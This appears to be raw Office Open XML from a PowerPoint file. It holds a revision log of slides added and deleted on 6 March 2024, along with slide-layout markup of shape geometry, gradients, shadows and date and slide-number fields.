          <pc:docMk/>
          <pc:sldMk cId="3047635210" sldId="526"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:13.031" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="648800262" sldId="527"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3309298493" sldId="527"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:13.031" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2278810913" sldId="528"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4105573417" sldId="528"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:13.031" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2367686813" sldId="529"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2952701727" sldId="529"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1703325160" sldId="530"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1631875527" sldId="531"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1502219837" sldId="532"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="800976723" sldId="533"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="29917826" sldId="534"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="100684599" sldId="535"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3321382538" sldId="536"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2294968667" sldId="537"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="612287851" sldId="538"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3781174994" sldId="539"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3052775818" sldId="540"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2584630935" sldId="541"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="543169184" sldId="542"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1206494948" sldId="543"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="177916792" sldId="544"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2503532844" sldId="545"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3067142477" sldId="546"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:52:42.295" v="60" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1839553723" sldId="547"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2552151424" sldId="548"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:46.331" v="8" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4246979879" sldId="549"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:46.331" v="8" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4246979879" sldId="549"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Michael Hennick" userId="47308667-b466-4bc8-8630-0f7e6f423307" providerId="ADAL" clId="{B6AF7CC1-E45F-4CCA-977B-C6360F9D885F}" dt="2024-03-06T22:47:14.290" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1364989287" sldId="550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6CDA61-E664-634D-841D-EBA9ED737D79}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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09D675-D049-E849-AB6D-29F53391A0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7947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pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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itchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{98E54A87-CEAD-43DD-B90A-322EA9E46157}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>14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953422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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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803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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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0537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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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5964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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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9977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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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50043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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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9308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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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20615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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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6225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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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2242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174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itchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3174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itchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{50422603-CE06-4DCA-83DD-FF1165B225C2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>49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997136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6C908-3BEF-4ED3-AB8C-A7292AB24F9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6788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6C908-3BEF-4ED3-AB8C-A7292AB24F9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2716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6C908-3BEF-4ED3-AB8C-A7292AB24F9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42462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6C908-3BEF-4ED3-AB8C-A7292AB24F9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6033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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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2587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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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7744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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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5864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6C908-3BEF-4ED3-AB8C-A7292AB24F9F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8480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0" y="4752126"/>
            <a:ext cx="9144000" cy="211296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066"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1331"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="5760" y="1331"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="5760" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1066"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path w="5760" h="1331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chemeClr val="bg1">
              <a:tint val="80000"/>
              <a:satMod val="200000"/>
              <a:alpha val="4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44450" dir="16200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6105525" y="0"/>
            <a:ext cx="3038475" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY0" fmla="*/ 9 h 4329"/>
              <a:gd name="connsiteX1" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY1" fmla="*/ 4329 h 4329"/>
              <a:gd name="connsiteX2" fmla="*/ 204 w 1914"/>
              <a:gd name="connsiteY2" fmla="*/ 4327 h 4329"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1914"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 4329"/>
              <a:gd name="connsiteX4" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY4" fmla="*/ 9 h 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" h="4329">
                <a:moveTo>
                  <a:pt x="1914" y="9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1914" y="4329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204" y="4327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1288" y="3574"/>
                  <a:pt x="1608" y="1590"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1914" y="9"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:tint val="90000"/>
              <a:satMod val="350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50800" dir="10800000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="4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429064" y="3337560"/>
            <a:ext cx="6480048" cy="2301240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="45720" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr lang="en-US" b="1" cap="all" baseline="0" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst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433050" y="1544812"/>
            <a:ext cx="6480048" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" rIns="45720" bIns="0" anchor="b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  <a:effectLst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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF2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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF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0" y="4752126"/>
            <a:ext cx="9144000" cy="211296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066"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1331"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="5760" y="1331"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="5760" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1066"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path w="5760" h="1331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chemeClr val="bg1">
              <a:tint val="80000"/>
              <a:satMod val="200000"/>
              <a:alpha val="4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44450" dir="16200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6105525" y="0"/>
            <a:ext cx="3038475" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY0" fmla="*/ 9 h 4329"/>
              <a:gd name="connsiteX1" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY1" fmla="*/ 4329 h 4329"/>
              <a:gd name="connsiteX2" fmla="*/ 204 w 1914"/>
              <a:gd name="connsiteY2" fmla="*/ 4327 h 4329"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1914"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 4329"/>
              <a:gd name="connsiteX4" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY4" fmla="*/ 9 h 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" h="4329">
                <a:moveTo>
                  <a:pt x="1914" y="9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1914" y="4329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204" y="4327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1288" y="3574"/>
                  <a:pt x="1608" y="1590"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1914" y="9"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:tint val="90000"/>
              <a:satMod val="350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50800" dir="10800000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="4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583837"/>
            <a:ext cx="6629400" cy="1826363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="4200" b="1" cap="none" baseline="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst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485800"/>
            <a:ext cx="6629400" cy="1066688"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="0" rIns="45720" bIns="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF2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3657600" cy="4525963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67200" y="1600200"/>
            <a:ext cx="3657600" cy="4525963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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF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486400"/>
            <a:ext cx="4040188" cy="8382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5486400"/>
            <a:ext cx="4041775" cy="8382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516912"/>
            <a:ext cx="4040188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516912"/>
            <a:ext cx="4041775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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF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7470648" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="460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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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0B0EF93-A27B-488A-AF90-2665E003BCF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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF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85528"/>
            <a:ext cx="3200400" cy="730250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l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57200" y="214424"/>
            <a:ext cx="2743200" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="0" rIns="45720" bIns="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l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57200" y="1981200"/>
            <a:ext cx="7086600" cy="3810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2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2B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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156448" y="6422064"/>
            <a:ext cx="762000" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{40B0EF93-A27B-488A-AF90-2665E003BCF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56732" y="1705709"/>
            <a:ext cx="3053868" cy="1253808"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1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065628" y="1019907"/>
            <a:ext cx="4114800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="50800" cap="flat">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152000" dist="345000" dir="5400000" sx="-80000" sy="-18000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="25000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="contrasting" dir="t">
              <a:rot lat="0" lon="0" rev="2400000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d contourW="7620">
            <a:bevelT w="63500" h="63500"/>
            <a:contourClr>
              <a:schemeClr val="bg2">
                <a:shade val="50000"/>
              </a:schemeClr>
            </a:contourClr>
          </a:sp3d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556734" y="2998765"/>
            <a:ext cx="3053866" cy="2663482"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" rIns="45720"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="12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422064"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BF42B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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B0EF93-A27B-488A-AF90-2665E003BCF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/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4752126"/>
            <a:ext cx="9144000" cy="211296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066"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1331"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="5760" y="1331"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="5760" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1066"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path w="5760" h="1331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chemeClr val="bg1">
              <a:tint val="80000"/>
              <a:satMod val="200000"/>
              <a:alpha val="4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44450" dir="16200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Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="0"/>
            <a:ext cx="1828800" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY0" fmla="*/ 9 h 4329"/>
              <a:gd name="connsiteX1" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY1" fmla="*/ 4329 h 4329"/>
              <a:gd name="connsiteX2" fmla="*/ 204 w 1914"/>
              <a:gd name="connsiteY2" fmla="*/ 4327 h 4329"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1914"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 4329"/>
              <a:gd name="connsiteX4" fmla="*/ 1914 w 1914"/>
              <a:gd name="connsiteY4" fmla="*/ 9 h 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" h="4329">
                <a:moveTo>
                  <a:pt x="1914" y="9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1914" y="4329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204" y="4327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1288" y="3574"/>
                  <a:pt x="2082" y="1734"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1914" y="9"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:tint val="90000"/>
              <a:satMod val="350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50800" dir="10800000" algn="ctr" rotWithShape="0">
